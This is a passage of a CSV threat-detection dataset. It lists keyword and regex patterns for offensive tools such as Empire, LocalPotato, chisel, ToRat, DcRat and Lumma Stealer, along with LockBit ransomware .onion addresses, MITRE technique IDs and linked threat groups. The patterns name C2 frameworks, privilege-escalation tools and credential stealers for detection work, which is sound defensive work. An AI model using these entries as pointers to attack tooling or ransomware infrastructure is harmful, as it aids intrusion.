WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51203"
"*Local:Remove-ADS*",".{0,1000}Local\:Remove\-ADS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51204"
"*Local:Write-HijackDll*",".{0,1000}Local\:Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51205"
"*-local=0.0.0.0:4001*",".{0,1000}\-local\=0\.0\.0\.0\:4001.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","51206"
"*LocalAdminSharp.csproj*",".{0,1000}LocalAdminSharp\.csproj.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51207"
"*LocalAdminSharp.exe*",".{0,1000}LocalAdminSharp\.exe.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51208"
"*LocalAdminSharp-main*'",".{0,1000}LocalAdminSharp\-main.{0,1000}\'","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51209"
"*localexploit_demo_template.erb*",".{0,1000}localexploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51210"
"*localhost/pipe/pwned*",".{0,1000}localhost\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","51211"
"*localhost/pipe/RustPotato*",".{0,1000}localhost\/pipe\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","51212"
"*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","51213"
"*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","51214"
"*localhost:3000*striker*",".{0,1000}localhost\:3000.{0,1000}striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","51215"
"*localhost:31337*",".{0,1000}localhost\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","51216"
"*localhost:4567*",".{0,1000}localhost\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","51217"
"*localhost:53531*",".{0,1000}localhost\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","51219"
"*localhost:8000/*/hardware*",".{0,1000}localhost\:8000\/.{0,1000}\/hardware.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51220"
"*localhost:8000/*/netscan*",".{0,1000}localhost\:8000\/.{0,1000}\/netscan.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51221"
"*localhost:8000/*/osinfo*",".{0,1000}localhost\:8000\/.{0,1000}\/osinfo.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51222"
"*localhost:8000/*/speedtest*",".{0,1000}localhost\:8000\/.{0,1000}\/speedtest.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51223"
"*localhost:8022*",".{0,1000}localhost\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","51224"
"*localhost:8848*",".{0,1000}localhost\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","51225"
"*LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)*",".{0,1000}LocalPotato\s\(aka\sCVE\-2023\-21746\s\&\sHTTP\/WebDAV\).{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51226"
"*localpotato -i*",".{0,1000}localpotato\s\-i.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51227"
"*LocalPotato.cpp*",".{0,1000}LocalPotato\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51228"
"*LocalPotato.exe*",".{0,1000}LocalPotato\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51229"
"*LocalPotato.html*",".{0,1000}LocalPotato\.html.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51230"
"*LocalPotato.sln*",".{0,1000}LocalPotato\.sln.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51231"
"*LocalPotato.vcxproj*",".{0,1000}LocalPotato\.vcxproj.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51232"
"*LocalPotato.zip*",".{0,1000}LocalPotato\.zip.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51233"
"*LocalPotato-master*",".{0,1000}LocalPotato\-master.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51234"
"*localreconmodules*",".{0,1000}localreconmodules.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","51235"
"*localrelay_linux_amd64*",".{0,1000}localrelay_linux_amd64.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51236"
"*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","51237"
"*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","51238"
"*localtonet.com/download/*",".{0,1000}localtonet\.com\/download\/.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","51240"
"*LocateBrc4Config*",".{0,1000}LocateBrc4Config.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51252"
"*Locedx765al Extensedx765ion Settinedx765gs*",".{0,1000}Locedx765al\sExtensedx765ion\sSettinedx765gs.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51254"
"*lockbit3753ekiocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2id.onion*",".{0,1000}lockbit3753ekiocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51256"
"*lockbit3g3ohd3katajf6zaehxz4h4cnhmz5t735zpltywhwpc6oy3id.onion*",".{0,1000}lockbit3g3ohd3katajf6zaehxz4h4cnhmz5t735zpltywhwpc6oy3id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51257"
"*lockbit3olp7oetlc4tl5zydnoluphh7fvdt5oa6arcp2757r7xkutid.onion*",".{0,1000}lockbit3olp7oetlc4tl5zydnoluphh7fvdt5oa6arcp2757r7xkutid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51258"
"*lockbit435xk3ki62yun7z5nhwz6jyjdp2c64j5vge536if2eny3gtid.onion*",".{0,1000}lockbit435xk3ki62yun7z5nhwz6jyjdp2c64j5vge536if2eny3gtid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51259"
"*lockbit4lahhluquhoka3t4spqym2m3dhe66d6lr337glmnlgg2nndad.onion*",".{0,1000}lockbit4lahhluquhoka3t4spqym2m3dhe66d6lr337glmnlgg2nndad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51260"
"*lockbit5eevg7vec4vwwtzgkl4kulap6oxbic2ye4mnmlq6njnpc47qd.onion*",".{0,1000}lockbit5eevg7vec4vwwtzgkl4kulap6oxbic2ye4mnmlq6njnpc47qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51261"
"*lockbit6knrauo3qafoksvl742vieqbujxw7rd6ofzdtapjb4rrawqad.onion*",".{0,1000}lockbit6knrauo3qafoksvl742vieqbujxw7rd6ofzdtapjb4rrawqad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51262"
"*lockbit74beza5z3e3so7qmjnvlgoemscp7wtp33xo7xv7f7xtlqbkqd.onion*",".{0,1000}lockbit74beza5z3e3so7qmjnvlgoemscp7wtp33xo7xv7f7xtlqbkqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51263"
"*lockbit75naln4yj44rg6ez6vjmdcrt7up4kxmmmuvilcg4ak3zihxid.onion*",".{0,1000}lockbit75naln4yj44rg6ez6vjmdcrt7up4kxmmmuvilcg4ak3zihxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51264"
"*lockbit7a2g6ve7etbcy6iyizjnuleffz4szgmxaawcbfauluavi5jqd.onion*",".{0,1000}lockbit7a2g6ve7etbcy6iyizjnuleffz4szgmxaawcbfauluavi5jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51265"
"*lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd.onion*",".{0,1000}lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51266"
"*lockbitaa46gwjck2xzmi2xops6x4x3aqn6ez7yntitero2k7ae6yoyd.onion*",".{0,1000}lockbitaa46gwjck2xzmi2xops6x4x3aqn6ez7yntitero2k7ae6yoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51267"
"*lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion*",".{0,1000}lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51268"
"*lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion.ly*",".{0,1000}lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51269"
"*lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion*",".{0,1000}lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51270"
